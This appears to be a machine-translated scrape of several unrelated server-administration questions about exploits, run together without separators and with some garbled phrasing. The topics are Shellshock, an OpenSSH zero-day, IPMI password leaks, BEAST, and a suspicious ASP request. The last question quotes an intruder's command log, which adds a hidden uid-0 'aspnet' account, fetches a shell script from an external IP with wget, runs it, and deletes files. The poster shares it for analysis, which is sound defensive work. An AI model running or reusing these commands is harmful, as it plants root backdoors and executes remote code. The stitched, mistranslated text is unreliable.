标签: exploit

我开始为一家公司工作，该公司解雇了一名前 IT 员工，原因是泄露数据。

我只能说以下几点：

我们使用 Firebird DB 和由另一家公司 Proxmox 编写的应用程序，用于 Windows Server 2008 R2、SQL Server、云核心 Mikrotik 路由器和其他一些 Mikrotik 设备的虚拟化。

我不是 100% 确定，但是有没有一些快速的方法来检查是否还有一些后门，而不会中断内部流程并重新格式化所有内容？

以前的这个人真的很好，用 C++ 和 C# 编写了软件。我也知道他在 ollydbg 中做了一些汇编程序并破解了一些程序。

昨天和今天（2014 年 9 月 24 日）广泛报道了通过 Bash 执行远程代码的机制。http://seclists.org/oss-sec/2014/q3/650报告为 CVE-2014-7169 或 CVE-2014 -6271

出于对我来说太愚蠢无法公开解释的原因，我负责运行 RHEL 4 且没有更新订阅的服务器。我可以建立一个克隆来测试这个，但我希望有人能有一个直接的答案。

1. Centos 4 中的 /bin/bash 是否已打补丁，还是会打补丁？
2. 我可以将一个（大概打过补丁的）Centos 4 /bin/bash 放入我的 RHEL 系统中作为一种可以让我花几周时间的解决方法吗？（我需要到 12 月 10 日）

根据Internet Storm Center 的说法，那里似乎存在 SSH 零日漏洞。

这里有一些概念代码证明和一些参考：

• http://secer.org/hacktools/0day-openssh-remote-exploit.html
• http://isc.sans.org/diary.html?storyid=6742

这似乎是一个严重的问题，所以每个 Linux/Unix 系统管理员都应该小心。

如果这个问题不及时修补，我们如何保护自己？或者您通常如何处理零日漏洞？

*我会在回复中发布我的建议。

我有一些运行 IPMI 的 Supermicro 服务器，如本博客中所述（http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some- added-extras）有一个严重的漏洞从任何远程位置获取明文管理员密码。

如何检查我的服务器主板是否已损坏？

在北美或其他地方，是否有服务器管理员对让服务器易受攻击负责的先例？

例如，如果 IIS 中存在已知漏洞——Microsoft 为其发布了补丁，并且出于 X 原因，您没有将其应用到您的服务器上，您的站点就会受到黑客的攻击，结果您最终会用恶意软件感染您的访问者最终可能造成经济损失。你或你可以承担责任吗？

这是主观的，显然不是我做的;) 只是好奇。

现在 BEAST 是公共知识，TLS 1.0 使用起来并不安全（SSL 3.0 也不安全）。我看到有报道称 RC4 密码不受影响（并得到广泛支持）。真的吗？

我知道 TLS 1.1 是免疫的。但在 1,000,000 个最流行的启用 SSL/TLS 的网站中，只有少数 (221) 个支持 TLS 1.1 或更高版本。

该漏洞利用仅限于浏览器，因为它需要通过 MITM 使用 JavaScript 或浏览器插件。在撰写本文时，PayPal.com 易受攻击。

我认为这是某种类型的黑客尝试。我试过用谷歌搜索它，但我得到的只是看起来已经被利用的网站。

我看到对我的一个页面的请求看起来像这样。

/listMessages.asp?page=8&catid=5+%28200+ok%29+ACCEPTED

'(200 ok) ACCEPTED' 很奇怪。但它似乎没有做任何事情。

我在 IIS 5 和 ASP 3.0 上运行。这个“黑客”是否适用于其他类型的网络服务器？

编辑：

正常请求看起来像：

/listMessages.asp?page=8&catid=5

寻找一些 (*nix) 软件，它将在服务器上建立“有趣”文件的索引，并在某些文件内容被修改或出现新文件时发出通知。

与 rkhunter 等人类似，但较少关注系统二进制文件，而更多关注通过 Web 提供的可执行文件。

有什么建议吗？

在我们的环境中，我们经常需要运行不同应用程序的旧版本，我想知道其中的安全隐患。所以我希望有一个网站基本上列出了 AppXX1 版本 V2 有 X 个已知的漏洞。

我当然会考虑更大的应用程序，如 Java、IE。

我可能刚刚检测到我的服务器上的用户已经植根了我的服务器，但这不是我要问的。

有没有人见过这样的命令：

echo _EoT_0.249348813417008_;
id;
echo _EoT_0.12781402577841_;
echo $PATH && a=`env |grep PATH | awk -F '=' '{print $2":/usr/sbin"}'` && export    PATH=$a && echo $PATH;
echo _EoT_0.247556708344121_;
whereis useradd;
echo _EoT_0.905792585668774_;
useradd -p saZlzoRm9L4Og -o -g 0 -u 0 aspnet;
echo _EoT_0.369123892063307_;
wget http://178.xxx.xxx.181/suhosin14.sh;
echo _EoT_0.845361576801043_;
chmod +x suhosin14.sh && ./suhosin14.sh && sleep 5 && ls -la && locate index.php;
echo _EoT_0.161914402299161_;
rm -rf /tmp/ZyCjBiU;
echo _EoT_0.751816968837201_;

在我看来，这是一些自动化脚本的工作，但我不确定是哪一个。

任何人都有这方面的线索？

操作系统是 Debian Lenny，内核 2.6.30-bpo.2-686-bigmem（如果这很重要）。

顺便说一下，上面代码中的链接被屏蔽了，任何想要下载代码的人，我都复制了一份供分析，所以我可以根据要求提供。

编辑：如果有人感兴趣，我正在附上 .sh 脚本的内容作为参考。

#!/bin/sh
PHP=`which php` …